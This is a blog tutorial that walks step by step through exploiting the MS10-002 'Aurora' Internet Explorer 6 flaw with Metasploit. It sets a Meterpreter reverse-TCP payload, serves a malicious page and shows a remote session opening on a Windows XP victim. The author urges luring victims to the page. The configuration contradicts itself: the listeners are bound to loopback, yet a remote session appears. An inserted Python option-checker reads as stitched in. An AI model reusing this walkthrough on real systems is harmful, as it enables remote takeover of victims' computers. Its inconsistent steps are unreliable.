Client Side Exploitation Using Metasploit

In this tutorial we’ll learn how to perform a basic client-side exploitation using Metasploit. Note that this tutorial is made for educational purposes only, to help you understand how such vulnerabilities can be exploited.


Client Side Attacks



Client-side attacks are attacks that target client-side applications, e.g. a web browser or a download client. They differ from server-side attacks: instead of targeting vulnerabilities in server-side software such as a web server, they target the application running on the client.

To demonstrate this attack we’ll use the Metasploit Framework and one of its basic client-side exploits.

Lab Setup



The lab consists of a victim machine and an attacker machine.

Code:
+++++++++++++++++++                   +++++++++++++++++++++
+ Attacker        +  ================ + Victim Machine    +
+                 +    Behind NAT     +                   +
+++++++++++++++++++                   +++++++++++++++++++++
Victim

The victim machine runs an unpatched Windows XP SP1 with Internet Explorer 6, which has a client-side vulnerability we will exploit.

Attacker

The attacker machine runs BackTrack 5 with Metasploit installed.

I am using virtual machines to set up my lab, and the network type is set to NAT.

Now that we have set up our lab, let the hacking begin.

Exploitation



First let’s open up the Metasploit console using ‘msfconsole’:-

Code:
  root@bt:~# msfconsole
   
                  __.                       .__.        .__. __.
    _____   _____/  |______    ____________ |  |   ____ |__|/  |_
   /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
  |  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
  |__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
        \/     \/          \/     \/ |__|
   
   
         =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
  + -- --=[ 688 exploits - 357 auxiliary - 39 post
  + -- --=[ 217 payloads - 27 encoders - 8 nops
  msf >
Though Metasploit provides hundreds of exploits for Internet Explorer 6, for this tutorial we’ll use the Internet Explorer Aurora exploit.

To select this exploit in Metasploit, simply use the ‘use’ command:-

Code:
  msf > use exploit/windows/browser/ms10_002_aurora
   
  msf exploit(ms10_002_aurora) >
Now let’s have a look at the options:-
Code:
  msf exploit(ms10_002_aurora) > show options
   
  Module options (exploit/windows/browser/ms10_002_aurora):
   
     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT     8080             yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH                      no        The URI to use for this exploit (default is random)
   
   
  Exploit target:
   
     Id  Name
     --  ----
     0   Automatic
Now let’s set them!
Code:
  msf exploit(ms10_002_aurora) > set SRVHOST 127.0.0.1
  SRVHOST => 127.0.0.1
  msf exploit(ms10_002_aurora) > set SRVPORT 80
  SRVPORT => 80
  msf exploit(ms10_002_aurora) > set URIPATH /
  URIPATH => /
  msf exploit(ms10_002_aurora) >
Above we set the server host (SRVHOST) to localhost, i.e. 127.0.0.1, the server port (SRVPORT) to 80 and the URI path to ‘/’ (the root).

Now let’s set the payload options:-
Code:
  msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
  PAYLOAD => windows/meterpreter/reverse_tcp
  msf exploit(ms10_002_aurora) > show options
   
  Module options (exploit/windows/browser/ms10_002_aurora):
   
     Name        Current Setting  Required  Description
     ----        ---------------  --------  -----------
     SRVHOST     127.0.0.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT     80               yes       The local port to listen on.
     SSL         false            no        Negotiate SSL for incoming connections
     SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
     URIPATH     /                no        The URI to use for this exploit (default is random)
   
   
  Payload options (windows/meterpreter/reverse_tcp):
   
     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique: seh, thread, process, none
     LHOST                      yes       The listen address
     LPORT     4444             yes       The listen port
   
   
  Exploit target:
   
     Id  Name
     --  ----
     0   Automatic
   
   
  msf exploit(ms10_002_aurora) > set LHOST 127.0.0.1
  LHOST => 127.0.0.1
  msf exploit(ms10_002_aurora) > set LPORT 31337
  LPORT => 31337
  msf exploit(ms10_002_aurora) >
Above we set the payload to windows/meterpreter/reverse_tcp, the listening address (LHOST) to localhost and the listening port (LPORT) to 31337.
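As an added check that is not part of the original tutorial, the following Python parses the fixed-width ‘show options’ tables shown above and flags the two things the NAT lab note makes important: a required option that is still unset, and a SRVHOST or LHOST bound to loopback, which a victim on a separate VM cannot reach. The sample table is constructed from the output above with LHOST left empty; the function names are my own.

```python
import re
from collections import namedtuple
from ipaddress import ip_address
Option = namedtuple("Option", "section name value required")

# Constructed sample of the fixed-width tables msfconsole prints for "show options" (LHOST still unset).
SAMPLE = """\
Module options (exploit/windows/browser/ms10_002_aurora):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     127.0.0.1        yes       The local host to listen on
   SRVPORT     80               yes       The local port to listen on.
   URIPATH     /                no        The URI to use for this exploit

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
"""

def parse_show_options(text):
    """Parse the 'show options' tables into Option tuples (section, name, value, required)."""
    options, section, cols = [], None, None
    for line in text.splitlines():
        if line and not line[0].isspace():  # a non-indented line starts or ends a table
            m = re.match(r"(Module|Payload) options \((.+)\):", line)
            section, cols = (m.group(2) if m else None), None
            continue
        if "Name" in line and "Current Setting" in line:  # header row gives the column offsets
            cols = [line.find(h) for h in ("Name", "Current Setting", "Required", "Description")]
            continue
        if cols is None or not line.strip() or line.strip().startswith("--"):
            continue
        name, value = line[cols[0]:cols[1]].strip(), line[cols[1]:cols[2]].strip()
        required = line[cols[2]:cols[3]].strip().lower() == "yes"
        options.append(Option(section, name, value, required))
    return options

def lab_problems(options):
    """Flag required options left unset and listener addresses bound to loopback (assumes IP literals)."""
    problems = []
    for o in options:
        if o.required and not o.value:
            problems.append(f"{o.name} is required but not set ({o.section})")
        elif o.name in ("SRVHOST", "LHOST") and o.value and ip_address(o.value).is_loopback:
            problems.append(f"{o.name}={o.value} is loopback; a victim on another VM cannot reach it")
    return problems
```

Run `lab_problems(parse_show_options(SAMPLE))` to see both warnings; after setting LHOST to the attacker VM’s NAT address only the SRVHOST warning would remain.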

Now that everything is set up, let’s launch the exploit:-
Code:
  msf exploit(ms10_002_aurora) > exploit
  
  Exploit running as background job.
  Started reverse handler on 127.0.0.1:31337
  Using URL: http://127.0.0.1:80/
  Server started.
The malicious web page is now being served at http://127.0.0.1:80/. All that remains is to direct the victim to this page; if they are running an exploitable browser on Windows XP, they’ll get owned!

In this case I’ll use the vulnerable IE browser on the victim machine to view this site. Now see what happens:-

Code:
  Sending stage (723456 bytes)
  Meterpreter session 1 opened (192.168.0.1:31337 -> 192.168.0.2:1514)
  
  msf exploit(ie_aurora) > sessions -i 1
  Starting interaction with 1...
  
  meterpreter > getuid
  Server username: WINXP\VICTIM
We got a Meterpreter session. From here you can execute commands on the victim system, so the victim machine is owned.

That’s all for this tutorial, stay tuned for more.

Please comment if I have done well, or once you have finished learning from the blog.